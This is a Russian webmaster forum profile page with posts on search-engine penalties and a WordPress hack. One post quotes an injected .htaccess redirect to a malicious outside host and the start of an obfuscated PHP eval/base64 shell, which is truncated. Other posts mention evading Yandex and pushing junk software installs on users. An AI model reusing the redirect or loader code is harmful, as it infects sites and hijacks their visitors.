Jack SparroW

Jack SparroW
Рейтинг
211
Регистрация
06.12.2012
Должность
Капитан
Смекаешь?
Klanser:
Еще манулом сайт прогоните, чтобы яндекс точно видел, что вы встали на праведный путь :)

Спасибо. Самый дельный совет. Так и сделал, даже не знал про такую прогу :)

awasome:
Поверим. Только причем тут вп, если шелл был залит через плагин?

Притом что он давал модифицировать системные файлы. ДА и вообще теперь он мне не нравится 😡

Уж больно легко заражаются wordpress сайты с этими плагинами. Тем, кто, как я не профессионально занимается вебмастерингом, легко попастся на удочку мошенников, распространяющих вирусы под видом плагинов для wordpress.

Плагин

All in One SEO Pack, каюсь, скачал из инета....

MrDesigner:
Зачем вы троллите?

Расскажите уж нам - через какую дырку Вордпресса ломанули движок?

Вот этого я и боюсь, что никто не поверит, тем более в яндексе... (как вы например).

Через seo плагин был залит шеел. Хостинг сразу же ругался и выдал вирус {CAV}Php.Trojan.StopPost, я его удалить смог только через 2 дня, т.к. область заражения была огромная (десяток сайтов).

htaccess прописывалось следующее:

RewriteCond %{REMOTE_ADDR} ^213\.87\.(128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143)\. [OR]

RewriteRule .* http://warp-master.ru/opera/load/ [L,R]

и далее....

В файлы движков добавлялся php код, и обнаружил неизвестный файл в корне сайта:

<?php $YLbgPfj524 = "vh46afl7tm2ik*n3pws.bu;0j)(qo_erzxy51dg9c8/";$oDJXw7301 = $YLbgPfj524[16].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[38].$YLbgPfj524[29].$YLbgPfj524[31].$YLbgPfj524[30].$YLbgPfj524[16].$YLbgPfj524[6].$YLbgPfj524[4].$YLbgPfj524[40].$YLbgPfj524[30];$Gcwa9593 = "".chr(101)."\x76".chr(97)."".chr(108)."".chr(40)."g\x7Ai\x6E".chr(102)."".chr(108)."a".chr(116)."".chr(101)."".chr(40)."ba".chr(115)."e".chr(54)."\x34_".chr(100)."".chr(101)."".chr(99)."o\x64e".chr(40)."";$O9654 = "".chr(41)."\x29)".chr(59)."";$jlvpdR6408 = $Gcwa9593."'TZxXr.

Вместо тысячи тем "Минусинск заработал"

А мой то подключите?

Doublemint:
Profitraf, Мне тоже если можно в ЛС, а то только день назад сняли метку, я сразу поставил пп и через 2 дня опять метка...

Аналогично... А дело вот в чем. Придумал свою защиту от яндекса - 100% работала. Пока какой-то олень не пожаловался на мой сайт через "чудо-кнопку". Затем через 3 дня код убрал, метку сняли. Но как защиту обновил, код вернул, опять кто-то настучал в яндкес. Вот что значит сайт в топ №1 по своему запросу...

Как избавиться от ручных меток (по стуку)?

Дайте код приглашения

Сайт на ucoz получил метку от яндекса. Похоже решиние проблемы только одно, перестать устанавливать пользователям всякую дрянь, оставить лишь mail.ru и замечу что 2 года назад устанавливали только guard mail и стартовую и денег выходило столько же, сколько сейчас от семи установок барахла

На самом деле нужны. Но только для гугла, а вот Яндексу все равно есть кейвордс или нет.

Всего: 1576